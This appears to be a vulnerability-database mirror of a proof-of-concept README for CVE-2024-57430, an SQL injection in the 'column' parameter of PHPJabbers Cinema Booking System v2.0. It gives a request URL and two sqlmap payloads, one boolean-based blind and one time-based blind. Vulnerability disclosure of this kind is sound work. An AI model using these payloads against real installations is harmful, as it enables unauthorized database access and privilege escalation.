关联漏洞
标题:
N/A
(CVE-2024-57430)
描述:在PHPJabbers Cinema Booking System v2.0的pjActionGetUser函数中存在SQL注入漏洞,攻击者可以通过操纵column参数来操纵数据库查询。利用该漏洞可能导致未经授权的信息泄露、权限提升或数据库操纵。
描述
CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 is vulnerable to SQL injection, leading to unauthorized data access and privilege escalation.
介绍
# CVE-2024-57430
An SQL injection vulnerability in the pjActionGetUser function of PHPJabbers Cinema Booking System v2.0 allows attackers to manipulate database queries via the column parameter. Exploiting this flaw can lead to unauthorized information disclosure, privilege escalation, or database manipulation.
Vulnerable Parameter: ```column```
## Impact:
SQL injection can lead to unauthorized access to sensitive information, database modification, and even full compromise of the database server. This poses a critical threat to the confidentiality, integrity, and availability of the application.
## Exploit - Proof of Concept (POC)
### SQL Injection
GET Request on URL: ```http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10```
### SQLMAP on column
```
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
```
文件快照
[4.0K] /data/pocs/a5ab39355b1c4773ffda294b0c85acdbc8799cbe
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。